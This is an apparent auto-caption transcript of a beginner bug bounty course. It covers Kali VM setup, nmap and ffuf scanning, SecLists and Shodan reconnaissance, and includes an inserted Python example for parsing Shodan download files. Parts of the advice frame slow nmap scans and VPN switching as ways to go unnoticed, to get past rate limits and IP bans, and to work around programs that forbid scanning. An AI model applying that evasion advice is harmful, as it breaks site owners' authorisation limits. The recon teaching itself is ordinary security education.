Beginner to Advanced Bug Bounty Hunting Course | UPDATED

Captions
Hey, thanks for stopping by my channel. The purpose of this course is to take you from a complete beginner who doesn't even have a Kali Linux machine set up on your computer to someone who's able to successfully go out and find bugs on bug bounty programs, be able to read the activity and other people's exploits, and understand what is going on. I see a lot of videos on YouTube and Twitter threads saying "this is everything you need to study in order to become an ethical hacker," and I decided, instead of just making a road map or some kind of Twitter thread, I'll just give you a video that is going to take you through the process of what I think is everything you need to know in order to become a bug bounty hunter. You'll have a great foundation for recon, you'll be able to find the most common vulnerabilities, and you'll be able to understand some of the more complex vulnerabilities and how to exploit them. What I do in this course is not just tell you what you need to study; I actually walk you through the process of studying, learning, and understanding these exploits. So if there's anything specific you want to learn in the world of bug bounty hunting, you can look for the timestamp for that specific vulnerability and you can go ahead and skip to that section of the course, because you can always come back later.

All right, before we get started and jump into this course, there is one thing that I want to mention. These courses and videos do take a long time for me to put out, and my YouTube channel is small enough that no one wants to sponsor me. So if you'd like to buy some hacker merch that looks kind of like this, or this, or maybe a little bit of this, then you can go ahead and click the link in the description. Or if you would like to buy this course or another course, or just a section of this course, and be able to save your location and come back to it, you can check out the link in the description that is going to lead you to my website. And if none of that works out, that is totally fine; you can go ahead and enjoy this free course here on YouTube, and I hope that is helpful and beneficial for you in your journey to become a cyber security professional. Now let's go ahead and jump into it.

All right, it did not take long for us to come to a crossroads where you get to decide what kind of virtual hosting software you would like to use. There is a free software called VirtualBox. You can download it here; you can download it for a Mac, you can download it for Windows. And I strongly recommend you avoid VirtualBox. I tried using VirtualBox when I first started, and this was quite a while ago, so maybe it is better now, but when I ran VirtualBox I struggled for months, because I did not want to pay any money to have a good virtual machine hosting software. But after it kept on lagging and freezing and I couldn't get Hack The Box to work, I decided I was done with VirtualBox and I was ready to pay money. If you want to avoid paying money and you want to try VirtualBox, and maybe you'll have better luck than I did, you can go ahead and download it here and we'll walk through the steps to do that. Or you can run VMware. If you are running on Windows you will download it here, and I'll have this linked in the course resources. You will download VMware Workstation and you will run this as your virtual machine hosting software. VMware is my go-to; I still use VMware. You get 30 days free, so if you're struggling with VirtualBox you can try VMware for free for 30 days, and you can run your Kali Linux machine on VMware and give it a test. I have never had any problems with VMware and it has worked really well for me, so it is the one I recommend. You can download it for Windows or you can download it for Mac. I am running a Mac and I run VMware Fusion, because that's VMware's software for Macs. So this is your decision: you can choose which one you would like and begin installing it in the next video. All right, if
you have chosen VirtualBox as your virtual machine hosting software, may the force be with you, and may you have much better luck than I did. If you're on Windows you will go ahead and download for Windows; if you are on Mac you will download for Mac. I have already downloaded VirtualBox. It is really simple: you click download, you will extract the download, and then this is what you will be brought to, the VirtualBox Manager. I have a really old machine that's actually deleted off my Mac now; you can see the last time I ran VirtualBox was in 2020, and I downloaded this virtual machine from Kali Linux. So what you'll do (this will be listed in the course resources) is come over here, go to Virtual Machines, and it will ask you whether you want to use VirtualBox or VMware, and you will choose VirtualBox for the sake of this video. It is quite a large download; I am not going to download it because I am running out of space on my Mac, but you will hit download. It will save to your Downloads if you're on a Mac, and I'm assuming it'll save to your Downloads if you're on Windows as well. Then once it is finished downloading, you will open up the folder that it is in, you will extract it, because I think it downloads as a zip, and once you have done that and you are ready to open it, you will right-click on the VirtualBox image that has finished downloading, it'll say "open with," and you will click "open with VirtualBox," and it will bring you to this page. It might actually even try to open the machine and start it, and you can let it run and then shut it down. You'll want to shut it down because there are a few things you need to set up on it before you do, within this Settings tab.

Okay, one thing I forgot to mention: when you launch your box, or it automatically starts, you will need to click "I copied it" when you are prompted. It's going to ask you where the machine came from; I forget the other option, all I remember is you need to click "I copied it." And if you save this machine on, like, an external hard drive or something, and your computer, either your Windows software or your Mac, whatever you're running, crashes, you can always grab your old virtual machine off that external hard drive, and when you put it back onto VirtualBox it's going to ask you the same thing. It'll ask you where the image came from, and you will select "I copied it," so remember to select that. Also, instead of right-clicking and opening it, you can come in here and name your Linux box that you've just downloaded from Kali Linux, go to the place where your VirtualBox image is stored, click on it, and then open it. I don't recommend that way because it is more challenging, and I remember struggling to get that to even work; it's easier just to "open with." Let the box start to open, either let it open all the way up and log in with your default credentials (kali is your username and kali will be your password), however, shut it down once that's happened, because it will begin to lag if you don't. You'll need to come into your settings, and this will matter based on how much RAM you have and how many CPUs. We will go over to our settings; we will want to adjust our RAM to as much as you can dedicate. I think I do somewhere around eight to ten; I'm really not sure how much I give it, I know that it's a lot. Especially on VirtualBox, it's going to eat all the RAM you give it. It will also eat all your CPUs. I typically dedicate four to the machine; I think the one that I work on the most I might even dedicate eight, I might even have more than that, I'm not really sure. But the more CPUs you can dedicate, especially to VirtualBox, the better, because it will use all of what you give it. And if you don't have a lot, that's okay; you just might not be able to run hashcat, which we will get to way later in this course, I think somewhere around eight hours into this course. You might struggle running hashcat, but that's okay, you will be able to copy everything as I have run it for us in the videos. And that is it for setting it up. You'll hit OK, I'm going to close out of it, and then you will launch the box. You can right-click on it and then go to Start, and you will start the machine, you will log in, and I will see you on the inside.

All right, if you have chosen VMware, this video and setup is for you. If you have chosen VMware, I think you have chosen wisely. So what you will do: I am running VMware Fusion, so I would come down here and I would download the VMware Fusion Player. I have already downloaded it, so I am not going to do that again. Once it downloads it will save into your Downloads, and you will extract the zip if it is in a zip folder, and then you will open it. On a Mac you'll drag it into your Applications, and then you can launch your VMware Fusion software. If you're on Windows, I actually have a Windows box over here which I have not downloaded VMware Fusion, or VMware, on, but I'm assuming it is going to be done just the same: you would come into VMware, you would come down to Windows, you would download it, you will extract it if it downloads into a zip, and you will then launch that, and you will have something that looks similar to this. It'll look like this, basically exactly what I have here. And then from here we are going to put our virtual machine into our virtual hosting software. So we will go to Kali Linux, this is also linked in the course resources; we need a virtual machine, so we shall select that. If you chose VMware you will download right here; it's 2.3 gig. I am fairly certain this is zipped and you will need to unzip it. There are several different ways to unzip it, and you will have to go about unzipping it however you choose. Once it is unzipped, you can actually go into the Downloads where it is saved, click on that unzipped image, and just drag it over here and drop it, or you can right-click and then select "open with VMware Fusion." One thing to remember: when you open it, it's going to say "where did this image come from," and you're going to say "I copied it." It's important to click "I copied it" or you will not be able to get the image to open. Now that we have the image on our box, we will want to adjust our settings. You can right-click and go to Settings. We will want to have our memory really high; I went ahead and just put as much RAM as I could dedicate towards it, and I have five processors, five cores, dedicated to the machine as well. You will want to dedicate as much as you can spare. If you don't have a lot, that's okay; you won't be able to run hashcat, as we will see later on. I have tried to run hashcat with fewer cores and less RAM and it would just error out and say that there is not enough space or memory dedicated to the machine, and that's fine. If you don't have that, I will be able to show you all of the cracked passwords and hashes as we go through this course, but the more you have to dedicate to your machine, the faster you will be able to crack passwords and hashes. But this will not be something that we encounter until at least eight hours into the course, so you will likely forget about this, and you can just run it with however much space you have to dedicate. And with that, your default credentials: when you launch your box you'll right-click and you can Resume, or it'll say Start if it's in a powered-off state, and your default credentials will be the username kali and the password kali. And with that, I will see you on the inside.

In this video we're going to talk about how to scan specific targets in bug bounty programs, as well as fuzzing our targets, without getting ourselves into any trouble. I know there's a lot of interest in learning how to scan and fuzz bug bounty targets, because sometimes you'll be reading through a program's rules and it'll specifically say that there is no scanning allowed. Now there are a couple of ways to get around this, and if you watch my Shodan video you can actually
use Shodan to scan your bug bounty targets, and then you don't have to worry about anything because you're using Shodan, and that is one way to get around scanning a target and staying in the clear. Now you can use nmap and fuzzing tools to do this as well, and that's the purpose of this video. So we're going to go ahead and look at this, and I'm going to show you how to do this without getting yourself into any hot water and be able to scan these targets without any issue. Before we get going too far, I want to explain to you why you're not allowed to scan these specific targets, and there are really two main reasons. One, the company doesn't want a bunch of bug bounty hunters using ffuf, which is going to send several hundred requests per second to their server and have them get DoSed, and sometimes if you do this you will actually get rate limited or even have your IP banned, which is why I always recommend using a VPN. But there is a way to go around this, and I'm going to show you that at the end of this video. And the second reason a lot of programs are going to tell you they don't want you scanning their network is that people will use vulnerability scanners, and this is just really a big no-no. Don't use vulnerability scanners. Recently a program went live and then they were getting scanned so much with vulnerability scanners that they actually removed themselves from the bug bounty program. So don't use vulnerability scanners. These are the two big reasons why a lot of programs will say no scanning, so just be aware of that. If you're going to fuzz for directories, make sure to slow down the amount of requests, which I'm going to show you how to do, and don't use vulnerability scanners.

Now first I want to show you how to use nmap without getting yourself into any trouble. So I've gone ahead and opened up Tenet from Hack The Box here; if you follow my channel at all, you will know this is my go-to box for web app education. And the first thing we are going to do is run an nmap scan. So we have opened up our terminal here, and you're probably familiar by now with an nmap scan. Now this is the typical nmap scan that I like to run; I'm going to change the IP right here. So if you would like to jot this down, this is how I run an nmap scan if I'm doing a capture the flag. But we are not doing a capture the flag; we're going to be scanning a bug bounty program, and it's going to look a little bit different. So we still want this -A. We will want a -F, and this is only going to scan the top 100 ports. The reason I'm telling you to use the -F is because if you're new, you're probably not going to know which ports you want to look at. So I have a list of ports that I use when I run an nmap scan, because you don't want to scan all 65,535 ports (I think that's how many there are); you want to scan just a specific number of ports. A lot of networks are not going to want you going out and scanning their entire network, but it's okay to go out and scan the top 100 ports; they're probably not even going to notice, and I'll show you how to make it so that they're not going to notice, and you're not going to cause any kind of intrusion, and they're not going to care. So we want to run the -F for our ports, and then you're going to want to run a -T and then a 1 or a 2. This is going to really slow down your network scan. I think that nmap runs on a -T3 automatically, and if I'm in a hurry and I just want some ports to shoot at, if I'm in a CTF, I'll run a -T5; that's as fast as you can go. But if you run a -T5 in a CTF you can actually miss ports. So if you're really nervous about running any kind of scan, you can go ahead and run a -T1, and they're not going to notice that you're scanning their ports. This is going to really slow down your nmap scan. And then this -v right here will tell you the open ports as it hits them. So this is going to run a really slow scan on the top 100 ports, and nobody's going to notice. So you can go ahead and run this, and it says that there are two ports, and it's going to pop down with the ports as it hits them, and so eventually you're going to see port 80 pop up. I'm not really sure what other ports are open on this program, but this is how I would run an nmap scan, and so you can see right here it tells us that it's scanning the top 100 ports.

All right, so I decided to go ahead and add in this nmap network scanning legal issues page. So if you have any questions about using nmap legally on your specific targets and you're still worried about it, you can come and read this right here, and it's going to give you kind of the legalities of using it on different networks. I am not a lawyer, so I decided to go ahead and add this disclaimer in there that you are using this at your own risk, and you should check with the laws in your specific state on port scanning. So this is how I would run an nmap scan if I'm running one on a bug bounty program. This is going to be a really safe scan to run, and it's going to tell you the information that you want from these specific ports: which ports are open, what versions are running on your target. So you can go ahead and play around with nmap; this is how I do it, though.

And I want to show you how to fuzz for directories in a safe manner. You may still end up getting rate limited, which is fine, especially if you have a VPN; you can just switch your VPN. So we're going to go ahead and run ffuf now, and this is the syntax for ffuf. I'm going to show you this with this common wordlist right here, and then we'll go ahead and download SecLists, and you can see a better wordlist than what is default on the Kali machine. We can actually see what we have as options here, and you'll see that I'm using the -fc to filter out specific codes that I don't want to see. I think I had a 402 on here; 403, I don't want to see the 403s, but you can leave those in if you want, and then you can filter in other ways. But we're looking for that -p, and it is right here, and it's going to tell you how to delay your requests, and you can slow them down by however much you want, anywhere from 0.15 seconds to two seconds in between requests. Okay, so we have this request here, and let's say we really want to take our fuzzing really slow; you can run this with a two second delay or a one second delay in between requests. We don't really need to filter out by the not-founds, and then we're going to run our wordlist, and we're going to run the common wordlist (common.txt). So if you want to, you can go ahead and run it just like this and you will have this wordlist. So if we run this, you can actually see right here the progress; you can see the number of requests that are being sent, and so it's sending 37 requests every second, which is actually kind of a lot. One of the things about ffuf is it is really fast. We'll actually show you how fast this will run without slowing it down, and you can see right here it's sending 680, around 600, requests per second, and that is really fast. You're definitely going to get yourself rate limited or picked up running requests that quickly. But ffuf is my go-to tool. I often tell people that you can run dirb just like this and you shouldn't find yourself in any trouble, because dirb is pretty slow, but I like to use ffuf because of the options that are available with it.

Now I want to go ahead and show you how to install SecLists. I'm actually going to come back here; I do have SecLists already installed, which will save us some time, but you can come out to Google, go to their GitHub page right here, and you can run a git clone. So we'll copy that right here, and you'll want to cd into your /opt, and then you can type in a git clone right here, just like this, and you can see it's the last thing I actually installed on here. This will take a little while to run, and then you can cd into the SecLists directory and you can start looking through all of the different wordlists that they have in here. So you have a Fuzzing directory, you have a Discovery directory, and I actually think the Discovery one has some pretty good wordlists, and then we can cd into the Fuzzing directory because that's what we're doing, and there are all of these different wordlists for you to pick from when you're doing your fuzzing. So this is how I would recommend scanning a bug bounty program if you are looking for specific ports to be open or you are checking for directories. So good luck with your bug hunting.

We're going to be covering the tool Shodan for the purpose of bug bounty hunting and searching for vulnerabilities, as well as information disclosure, and how to use the tool within the command line as well as the actual browser. Shodan is an excellent tool for those who are new to the world of bug bounty hunting, or those who are timid when they read a program and it says that you should not scan a network, and you don't really want to run nmap and you're too afraid to actually scan the network. You can go check out Shodan, because Shodan scans the network automatically and then stores all the information in its database. So all we have to do is know what queries to run to pull the information from Shodan and read their information from when they have crawled the network or the web browser previously, and then we have access to all of that information without having to scan the actual target, and you don't have to worry about breaking any program rules. So the way Shodan works is it actually goes out and crawls every single device that is connected to the internet, whether it be your thermostat, your refrigerator, or your web security cameras, and it'll see if there are any vulnerabilities. It'll store the information, such as the software that is currently running on it, and if it has any vulnerabilities it is now open to the web and anyone can access your information. Your thermostat, refrigerator, your webcam, or even your printers, if they have any vulnerabilities, then the whole world will know it
because all they have to do is query that specific version, such as WordPress 1.4.7, and if you have a web application that is running that specific WordPress version, the whole world is going to know it, because there will be a CVE on it and you will be open to a potential attack. So the way Shodan works is it just crawls all of the internet and stores all of the information that it can possibly grab for anything that is connected to the internet. So what we're going to do in this video is run queries on Shodan, but because we're going to be doing this with a free account, you're only going to be able to run a very limited amount of commands or scans. If you're actually wanting to use the Shodan scan feature, you're going to actually have to pay for it; I think it's $70 a month, which is kind of steep. I personally would rather just scan it myself with nmap and look at the ports I specifically want and read the information that comes back that way, but I know that some of you would probably rather just pay the $70 a month and have access to the monitoring feature that we're going to cover a little bit later on. So typically when I think of the people who are going to enjoy Shodan the most, I often think that black hat hackers are going to be the ones who love Shodan the most, because it stores all the different version numbers, and if a new CVE comes out and somebody says "okay, we have this vulnerability to this specific software," they can just scan all of the internet and find out what devices are running that specific software, because black hats don't really care; they can just attack anything. But this can also be helpful for bug bounty hunters as well, because if a new CVE comes out you can go out the same way as a black hat would and say "Shodan, show me all of the devices running the specific software that are vulnerable to this CVE," and then you can download all of those devices and look through them to see if there are any web applications that are running that specific software, and then see if they have a bug bounty program and report it. This is going to be kind of tedious, but they'll be really easy bugs to find and vulnerabilities to report, because all you have to do is read the downloaded file and look for open bug bounty programs on those specific web applications.

So an example of Shodan being used in a really massive way, kind of for an unethical purpose, can be seen on Darknet Diaries. I forget the name of this specific episode; I think it came out a couple of months ago, and the guy goes by TheHackerGiraffe, where he actually used Shodan to look for vulnerable printers and he printed "subscribe to PewDiePie" to over 50,000 different printers. He was able to do this really easily and really quickly because he was able to just use Shodan to look for vulnerable printers. And so in that episode of Darknet Diaries, I think you can just look up "Darknet Diaries Hacker Giraffe" and listen to it if you want. All that guy did specifically was go to Shodan and look for vulnerable printers, and it seems like that's kind of one of his go-to tools: go to Shodan, look for some vulnerable software, and then look at all of the devices that happen to be vulnerable to that specific software or CVE.

So let's go ahead and jump into it. Here we are; I have gone ahead and opened up a terminal, which you will want to do, and then you will also want to go to shodan.io. I'm already logged in; you'll click Login over here. I personally just log in with Google, and this is a non-paid account, so we are going to be looking at basically the exact same setup that you're going to have when you first open up Shodan. The first thing we're going to do is use Shodan from the terminal. So if you just come in here and type in shodan and hit enter, you're going to get a bunch of options. Now these options are going to be default, and Shodan should already be installed on your Kali Linux machine, so I'm not going to actually walk you through how to install Shodan, because we're going to run it straight from here first in the terminal, and then we'll go through and actually check out the browser version later on. I've decided to show both the terminal and the browser because there are some people who really like running things straight from the terminal, and you'll be able to play around with it and figure out exactly what you like, and then there are other people who like to have a graphical user interface and they'll like the browser version better. And so what we're going to do is go ahead and initialize our Shodan for the terminal, and you can see this right here, this init. So we're going to end up running a shodan init, but we also need to have our API key. So you'll want to go ahead and log in; you'll want to go ahead and create an account and log into Shodan just like this, and then you will click Account and you will be able to grab your API key right here. So we'll copy this and come back to our terminal, and we're going to type in shodan init and then you will paste in your API key and hit enter, and it tells us that it has successfully initialized, and now we are ready to start making some Shodan queries. So the first thing we can do is just run a shodan info right here and see what it tells us about our account. So we can type in shodan info and then hit enter, and it's going to tell us we have zero credits available and scan credits available, and that is probably because I have already run some queries with this over here on the website. But it's not really going to make a difference; I'm going to show you how to run these queries, I just might not get the results back that you will. Every time you make a request, whether it is over here on the actual browser or it is inside of the terminal, it is going to use one of the credits that you have, but you can always pay and subscribe to Shodan and have more credits. Most of the bug hunters who are successful will have a paid subscription to Shodan, and they really like using Shodan, and we're going to cover why it's helpful. But personally, a lot of the stuff you're going to be able to get on Shodan you can find yourself by running some different tools, which I've covered on my channel previously, but that is not the purpose of this video.

So the second thing I want to show you is, often when you want to run something like, let's say, this shodan scan right here, what we can do is run shodan scan and then a -h, and it's going to tell us the options for the actual scan right here. So you can run a shodan -h, and then you can run shodan scan -h, and it's going to tell you the list of commands that you can run with each one of these commands that comes first. So when you're using Shodan, it'll be really helpful for you to know that you can run the -h with each one of these, so that you know exactly what you're going to be getting back and exactly how to get the information that you want in the future. And a lot of your understanding from these right here is going to come from playing around with them and reading the documentation and just pressing the -h on each one of them and figuring out what exactly they do. So one of the first ways to check out Shodan is we can just say shodan and then count, and then we'll say WordPress, and when you run this, this might not work for me because I don't have any credits, but when you run something like this you can see that we just want to count the number of results for this search. So what will happen is Shodan will go out and count all of the servers that it has in its database that are running this WordPress right here, and it actually did tell us, it tells us it has 52. But if you wanted to run something a little more specific... I spelled that wrong; that makes more sense, so 500,000. So if you were to run something like this, you might want to say you're looking for a WordPress version 1.4.7 because that's what your target is running, or there's maybe a new CVE out there and you just want to see, okay, what web apps are running WordPress 1.4.7, and then Shodan will give you a list of those actual web apps that are running that, and then you can see if any of them have a bug bounty program and then report to them: "hey, this new CVE for this WordPress has come out." So it saves you from having to go out and actually find a specific target and then looking to see what it is running, because Shodan will actually do the heavy lifting for you. And so all you have to do if you are a bug bounty hunter is say "this is the version the brand new CVE has come out for," so you would say to Shodan, 1.4.7 (which I actually don't even know if this is a real version), you would run this, and it is, and you would say okay, there are seven web apps that are running this version currently in the Shodan database. And then you would just go out and look to see if any of these seven have a bug bounty program, and if they do you can report "hey, the CVE came out and you're vulnerable to it." And so that's a really simple way to find bugs, and it's all based on recon, and you really don't have to do any heavy lifting. Very simple; you've seen how fast this has gone, and you could potentially have found a bug if this version were vulnerable to a CVE that had just come out.

So if you're familiar with nmap, what Shodan does is pretty similar: it goes out, scans the network, and it crawls all of the internet and pulls the banners, the versions, what's running, if it's Apache, if it's Windows, if it's got WordPress running, and what ports are open. And so with Shodan we can just query all of this, and it stores this in the database, and that's how it already knows that there are seven web apps running this WordPress 1.4.7, because all it has to do is check its database and it doesn't actually have to go out and scan. But we can scan with Shodan, and we're going to look at this in a little bit, but I just want you to know how Shodan works and that it already has stored all of this information on there. So now you can see how this is kind of a go-to tool for the black hat hackers, because they don't really care if these seven web applications have a bug bounty program or not; they just are going to attack it and see what information they can get out, because they don't really care about following the legal rules and the law. But as a bug bounty hunter, you need to make sure that these seven web apps, if they were vulnerable to a CVE, if they could attack WordPress 1.4.7, you would want to make sure you do everything legally, that you actually don't exploit the CVE. There's no need to actually go and try and exploit it; you can just report it: "hey, there's the CVE that came out and you are vulnerable," and you should be rewarded for it. And so as a bug hunter and a penetration tester we're looking for very specific targets, and then we can just run through these seven real quick and see who actually is vulnerable.

So now if we actually want to see what these seven web applications are that are running this WordPress right here, we can use the download feature within Shodan. Now I personally, if I was attacking a specific target, would just run nmap instead of using Shodan for this, but I want you to be aware that you can actually pull down version numbers of web apps with Shodan itself. But personally I would run nmap just to grab the banners and the version of a specific target. This is something that you would be using if you were just looking for a CVE that just came out, like we were previously talking about, and we would use the download function for this. We would just grab shodan and then we would say download, and then we're going to download the file as, let's say, WordPress file, and I'm not actually sure if it will work with this version number; I've only ever run it without the version number. So maybe we can throw this inside of quotes and see if this works; if not, we will just run it without quotes and see how that runs. So we'll run this, and it has saved five results into our WordPress file, a .json.gz, and we can unzip this and grab the file by typing in a gunzip and then our WordPress file, and then if we ls we should have our WordPress file .json. And I do not have gedit installed because this is a new machine, and if you don't have gedit installed either, you can sudo apt update, and I've already done a sudo apt update recently, so I'm going to sudo apt install gedit, and this will only take a second to download. And now we can gedit our WordPress file right here and look at the contents, and this looks really messy. So what you can do is actually just copy this, hit Command-A and Command-C, and then we can come over here and we can just type in "beautifier" like this, and we can just click on the top one and see if it will work for us, paste in the JSON for us, and you can click Beautify, and now we have our results right here. So it actually looks the same over here; it actually didn't make any difference, so maybe this one doesn't work for us. It tells us we have an error. Okay, we're going to just look at it right here. So you can actually see right here you get a hash, you are told it's from Shodan, it'll tell you the region where the web app is coming from, it's going to give us the time that it was crawled, we get the server that it is running on, and we have all of this different information here that Shodan has crawled from this specific target. We actually grab an ASN number. If you were looking for a specific target and you needed to pull down a version, and you were looking for a specific CVE and you wanted to download it so you could actually see what the Shodan database has stored for the WordPress 1.4.7, instead of just seeing "oh, there are seven of them," you would download it into a file just like this right here, and then you would unzip it, and then you can gedit and
actually look at the contents of the file and find the servers and the subdomains the URLs the as numbers and there's a lot of information in there that's going to be really helpful for you in your recon phase if these targets are actually vulnerable and they do have a bug Bounty program so one of the other things you're able to do with Showdown is run a is to run an IP address on the showdan Crawlers and so you're and one of the ways to grab an IP address so one of the ways you're going to be able to find the IP address there's several different ways that are going to be really easy so if we wanted to run just say a host yahoo.com it's going to give us back right here this range of IP addresses that are running on yahoo.com and if you wanted to just ping Yahoo .com we will be told right here is one of the IP addresses that we were able to Ping so if you look for this 74.14326 we can scroll up and see that this is one of the IP addresses right here you're actually able to find IP addresses through a burp as well so what we can do is come over here and open up a new tab type in yahoo.com and we can open up burp and intercept with the proxy and if we run this you'll actually be able to see right here on 443 you have this 98371163 and if you come back here you should be able to find right here and so those are several different ways to find IP addresses for a specific domain I'm actually going to close out of this but this is one way to do that and then you can just type in showdan and then we would type in host and then we can grab one of these IP addresses that we just saw and run it within showed in and it's going to give us some information right here it's going to tell us that this port 80 is open and Port 443 is open and it'll give us other information if you specifically want to look for an SSL certification you can find those and it's going to tell us it's running these different versions and you can go check to see if these SSL versions are out of date or 
what you can do with these within your recon phase you also get these other host names right here that can be associated with IP ranges and you can run a showdown host with an IP range and it's going to pull down a bunch more information for you within the entire range it'll give you all of the ports that are open within with the IPS and so the difference here between what we're able to find between Google and showdan is Google goes out and crawls the pages to see what is reachable but Showdown across all of the Internet connected devices and this is why you would find a refrigerator that might be connected or a webcam or or somebody's property cameras or literally anything that is connected to the internet like a thermostat and Showdown actually crawls everything that is connected to the internet and stores the data so one of the good things about running showdan like this is sometimes you are going to come across bug Bounty programs they're going to tell you that you are not allowed to scan a specific Network and as new bug bounty hunters I know there is a lot of questions about what you're allowed to do and what you're not allowed to do and so Showdown is a great way to scan a network without actually scanning a network because showdan already has stored all of the information that you're going to be looking for and you just have to go out and find it you have to know what commands to give such as this one right here if you're looking for open ports I personally would rather just run nmap with the ports that I want to find such as Port 22 port 80443 1443-3389 or whatever other ports you might come across but I would rather run in map with specific ports but I know there are some people who really worry about this and show Dan is a great option such as this showdown host right here to grab other domains you can grab subdomains and you can scan for ports and IP ranges and so this is an option if you're worried about scanning a Target in order to grab subdomains 
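Here is what working with that download file looks like in code, as an added example that is not part of the course or of the Shodan CLI: it writes a constructed .json.gz in the same shape as shodan download produces (one banner object per line, gzip-compressed), reads it back, folds the banners into the per-IP view that shodan host prints, and lists the IPs reporting the exact product and version you're chasing. The banners, hostnames, ASNs and addresses are made up (documentation address ranges and the reserved .test TLD); the field names follow the Shodan banner format as I know it, and WordPress 1.4.7 is the version the video used, not a real release.

```python
"""Triage a Shodan `download` file offline.

`shodan download <name> <query>` writes <name>.json.gz: gzip-compressed,
one JSON banner per line. This added example (not the course's or Shodan's
own code) builds a constructed file in that shape, reads it back, and
produces the per-host view that `shodan host <ip>` prints: open ports,
hostnames, ASN/org and the product/version seen on each port.
"""
import gzip
import json
import os
import tempfile

# Constructed sample banners. Field names follow the Shodan banner format
# (ip_str, port, hostnames, asn, product, version, http, _shodan, ...);
# addresses are from 192.0.2.0/24 and hostnames use the reserved .test TLD.
SAMPLE_BANNERS = [
    {"_shodan": {"id": "sample-1", "module": "http"}, "hash": 12345,
     "ip_str": "192.0.2.10", "port": 80, "transport": "tcp",
     "hostnames": ["blog.example.test"], "domains": ["example.test"],
     "org": "Example Hosting", "asn": "AS64496", "isp": "Example ISP",
     "timestamp": "2023-01-10T12:00:00.000000",
     "location": {"country_name": "United States", "region_code": "CA"},
     "product": "WordPress", "version": "1.4.7",
     "http": {"server": "Apache/2.4.41"},
     "data": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41\r\n"},
    {"_shodan": {"id": "sample-2", "module": "https"}, "hash": 12346,
     "ip_str": "192.0.2.10", "port": 443, "transport": "tcp",
     "hostnames": ["blog.example.test", "www.example.test"],
     "domains": ["example.test"], "org": "Example Hosting",
     "asn": "AS64496", "isp": "Example ISP",
     "timestamp": "2023-01-10T12:01:00.000000",
     "location": {"country_name": "United States", "region_code": "CA"},
     "product": "WordPress", "version": "1.4.7",
     "http": {"server": "Apache/2.4.41"},
     "data": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41\r\n"},
    {"_shodan": {"id": "sample-3", "module": "http"}, "hash": 12347,
     "ip_str": "192.0.2.20", "port": 8080, "transport": "tcp",
     "hostnames": ["shop.example.test"], "domains": ["example.test"],
     "org": "Other Org", "asn": "AS64497", "isp": "Other ISP",
     "timestamp": "2023-01-11T08:30:00.000000",
     "location": {"country_name": "Germany", "region_code": "BE"},
     "product": "WordPress", "version": "6.2",
     "http": {"server": "nginx/1.18.0"},
     "data": "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0\r\n"},
]


def write_download_file(path, banners):
    """Write banners as gzip-compressed newline-delimited JSON."""
    with gzip.open(path, "wt", encoding="utf-8") as fh:
        for banner in banners:
            fh.write(json.dumps(banner) + "\n")


def read_download_file(path):
    """Read <name>.json.gz (or an already gunzipped .json) banner by banner."""
    opener = gzip.open if path.endswith(".gz") else open
    with opener(path, "rt", encoding="utf-8") as fh:
        return [json.loads(line) for line in fh if line.strip()]


def summarize_hosts(banners):
    """Fold banners into a per-IP summary like the one `shodan host` prints."""
    hosts = {}
    for b in banners:
        h = hosts.setdefault(b["ip_str"], {
            "ports": set(), "hostnames": set(), "asn": b.get("asn"),
            "org": b.get("org"), "services": {}})
        h["ports"].add(b["port"])
        h["hostnames"].update(b.get("hostnames", []))
        if b.get("product"):
            h["services"][b["port"]] = f'{b["product"]} {b.get("version", "")}'.strip()
    return hosts


def hosts_running(banners, product, version):
    """IPs whose banners report an exact product/version pair, for example
    the version named in a freshly published CVE."""
    return sorted({b["ip_str"] for b in banners
                   if b.get("product") == product and b.get("version") == version})


def demo():
    """Round-trip the sample through a real .json.gz file and summarize it."""
    path = os.path.join(tempfile.mkdtemp(), "wordpress.json.gz")
    write_download_file(path, SAMPLE_BANNERS)
    banners = read_download_file(path)
    return summarize_hosts(banners), hosts_running(banners, "WordPress", "1.4.7")


if __name__ == "__main__":
    hosts, affected = demo()
    for ip, info in hosts.items():
        print(ip, sorted(info["ports"]), sorted(info["hostnames"]),
              info["asn"], info["org"], info["services"])
    print("reporting WordPress 1.4.7:", affected)
```

Run it as a script to print the summary, or point read_download_file at your own wordpress.json.gz. The CLI can do the flat extraction itself with shodan parse --fields ip_str,port,hostnames wordpress.json.gz, but the per-host grouping above is the view you want in your notes when deciding which IPs to check for a bug bounty program before you report anything.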
For enumerating subdomains, what I like to use is amass, and I'll link my amass video in the description if you'd like to learn more about that.

Now let's look at scanning a host instead of just looking at shodan host. With Shodan you can type shodan scan -h and see what the options are for scanning an IP. It tells us we can scan an IP with shodan scan, so we give it the same IP address and see what it gives back. It tells us we need to give it a command, so we say shodan scan submit followed by the IP, because we're submitting an IP address. Then it tells us I don't have any credits to run this scan, so I would need to go and pay to get some scan credits on my API key, which I'm not going to do. But this is another way to scan a network or an IP address to find what is open and do a little more recon.

You can also go out to Hurricane Electric; I think it's bgp.he.net. Here we can type in yahoo.com (I've shown this before in another video), and the site seems to be running really slow, but you run the search and it comes back, and you can grab these AS numbers, or ASNs, which is the easier way to say it. I would personally run these through amass because it's easier, but you can run them through Shodan as well; Shodan is going to be a lot faster, because all it has to do is query its database, whereas amass seems to take quite a bit longer to get the information back. But you can come out here and grab a network range, scan a network range, look through these ASNs and see what you can find. I've already made a video about that, so I'm not going to go into too much detail, but like I said, I'd personally go with nmap if I were going to scan any kind of network.

Now let's move on to the web browser. What's really cool about using Shodan in the browser is that they give you a filters cheat sheet. If you want to look for a specific network, a range or a CIDR range, you can do that through the search filter. The way you run these is by typing in, say, the organization Yahoo if we want to find Yahoo, and it pulls it down for us. Let's see what else I've run up here. If we delete this we can search an IP address, the one we already ran, and it pulls down the information: here's port 80 that it said was open, here's port 443, and it has grabbed all of the banners, which we can read through to see what's running. You can download the reports from here as well. One of the cool things about using the browser is you can look for sensitive information disclosures if you keep looking through here. You'll need to read through the cheat sheet, and I'd also recommend reading their documentation, because there are way more examples you'll be able to use. So if you wanted to look for something running a specific Apache version, maybe Apache 1.7.4 has a vulnerability, you can type in the product Apache with the version number and see if you're able to find anything vulnerable for that Apache version. Then you run through the results: okay, these people might be vulnerable to this, do they have a bug bounty program? These people are running this version, do they have a bug bounty program? There are a lot of ways you can be creative looking for known vulnerabilities and new CVEs in bug bounty programs, and then you can look for sensitive information with Shodan, because it doesn't know what's sensitive or not; it grabs all of the information and stores it in the database, and it's up to you as the bug bounty hunter to look at a specific target and see whether any sensitive information is being disclosed on Shodan, and then you can report it.

